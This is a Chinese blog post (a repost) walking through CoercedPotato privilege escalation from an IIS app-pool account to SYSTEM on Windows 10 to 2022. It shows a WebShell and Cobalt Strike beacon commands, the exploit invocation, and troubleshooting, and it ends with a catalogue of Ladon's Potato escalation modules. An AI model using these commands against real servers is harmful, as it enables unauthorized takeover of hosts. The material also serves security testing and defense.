CoercedPotato提权Win10-Win2022

admin 2023年12月12日03:19:38评论91 views字数 1962阅读6分32秒阅读模式

CoercedPotato 服务提权至system

影响版本

Win10Win11Win2016Win2019Win2022


测试环境 

Win11 22H2Microsoft Windows [Version 10.0.22621.1194]权限  iis apppooldefaultapppool


Win11 开启IIS服务  放个WebShell  通过WebShell上线CS

CoercedPotato提权Win10-Win2022

查看权限

beacon> shell whoami[*] Tasked beacon to run: whoami[+] host called home, sent: 37 bytes[+] received output:iis apppooldefaultapppool

系统版本

beacon> shell ver[*] Tasked beacon to run: ver[+] host called home, sent: 34 bytes[+] received output:
Microsoft Windows [Version 10.0.22621.1194]


提权命令

beacon> shell CoercedPotato.exe -c whoami


未开共享提权失败

CoercedPotato提权Win10-Win2022


exp有点问题,不退出,第2次执行失败,解决方案,改EXP,当然为了不在它身上浪费时间,也可以直接通过结束进程来解决。

CoercedPotato提权Win10-Win2022


再次提权,成功提至SYSTEM权限,使用Ladon GetPipe可查看到EXP开启的对应pipe管道有两个。

shell CoercedPotato.exe -c whoamiLadon GetPipe

CoercedPotato提权Win10-Win2022

CS插件版失败,Ladon GetPipe查看只起了一个spoolss管道

CoercedPotato提权Win10-Win2022


Ladon系列Potato提权

除了本文的Potato可提权至system,Ladon内置系列Potato如下

参考教程:    Ladon11.7更新3个横向移动5个Potato提权

[u]BadPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]EfsPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]GodPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]SweetPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]McpPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[+]McpPotato    .NET>=4.0 Win11/2022提权至System  其它系统自测[u]SweetPotato  超时18秒,无需taskkill自身,免得IIS下提权把IIS进程干了 解决退出问题[u]LadonLpe2  152KB  放过时、使用不多、易被杀的提权EXP在Lpe2 如bypassUAC、打印机提权等 PrintNightmare SpoolFool PrintNotifyPotato ms16135LadonLpe    257KB  GodPotato[+]GodPotato  Win8-Win11/Win2012-2022提权 (测试2012 R2 iis apppooldefaultapppool权限 失败)WIN11网络服务成功[+]badpotato  win8以上才可用,相当于.net 4.0程序集: install_clr、uninstall_clr、clr_exec、clr_efspotato、clr_badpotato程序集: install_clr、uninstall_clr、clr_exec、clr_efspotato、clr_badpotato功能: info、xp_cmdshell、installclr、clr_exec、clr_efspotato、cls_badpotato功能: info、xp_cmdshell、installclr、clr_exec、clr_efspotato、cls_badpotato[+]PrintNotifyPotato 提权Win10-11 Win2012-Win2022   移除[+]EfsPotato Win7-2019提权(服务用户权限提到system)[+] SweetPotato Win7-2019提权(服务用户权限提到system)[+] BadPotato  PrintSpoofer/PipePotato提权(Win8-Win10/Win2012-2019)[+] BadPotato  PrintSpoofer/PipePotato提权(Win8-Win10/Win2012-2019)


原文始发于微信公众号(K8实验室):CoercedPotato提权Win10-Win2022

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日03:19:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CoercedPotato提权Win10-Win2022http://cn-sec.com/archives/2288597.html

发表评论

匿名网友 填写信息